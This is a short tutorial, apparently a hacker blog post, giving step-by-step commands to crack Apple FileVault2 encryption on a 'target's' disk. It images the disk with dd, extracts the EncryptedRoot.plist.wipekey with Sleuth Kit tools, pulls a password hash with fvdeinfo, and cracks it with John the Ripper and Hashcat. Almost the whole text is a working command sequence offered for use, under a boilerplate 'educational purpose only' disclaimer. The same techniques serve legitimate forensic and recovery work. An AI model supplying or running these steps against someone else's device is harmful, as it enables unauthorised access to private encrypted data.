
How to Crack Apple’s FileVault2 Encryption

Here’s The Tut To Crack Apple’s FileVault2 Encryption

Purely For Educational Purpose Only, We Don’t Encourage Any Illegal Activities.

STEP 1: Use dd to extract an image of your target's FileVault2 encrypted disk:

sudo dd if=/dev/disk2 of=/path/to/filevault_image.dd conv=noerror,sync

STEP 2: Install fvde2john from https://github.com/kholia/fvde2john

STEP 3: Use hdiutil to attach the dd image:

hdiutil attach -imagekey diskimage-class=CRawDiskImage -nomount /Volumes/path/to/filevault_image.dd

STEP 4: Obtain the EncryptedRoot.plist.wipekey from the “Recovery HD” partition (see https://github.com/libyal/libfvde/wiki/Mounting#obtaining-encryptedrootplistwipekey):

mmls /Volumes/path/to/filevault_image.dd

fls -r -o 50450752 /Volumes/path/to/filevault_image.dd | grep -i EncryptedRoot

icat -o 50450752 /Volumes/path/to/filevault_image.dd 130 > EncryptedRoot.plist.wipekey

STEP 5: Verify and note the disk mount point for Apple_Corestorage:

diskutil list

…/dev/disk3s2 Apple_Corestorage

STEP 6: Use EncryptedRoot.plist.wipekey with fvdeinfo to retrieve the hash:

sudo fvdetools/fvdeinfo -e EncryptedRoot.plist.wipekey -p blablah /dev/disk3s2

This will return the hash.

FINAL STEP: Load this hash into JTR or Hashcat to crack it:

john --format=FVDE-opencl --wordlist=dict.txt hash.txt
hashcat -a 0 -m 16700 hash.txt dict.txt

Written by Akkie657
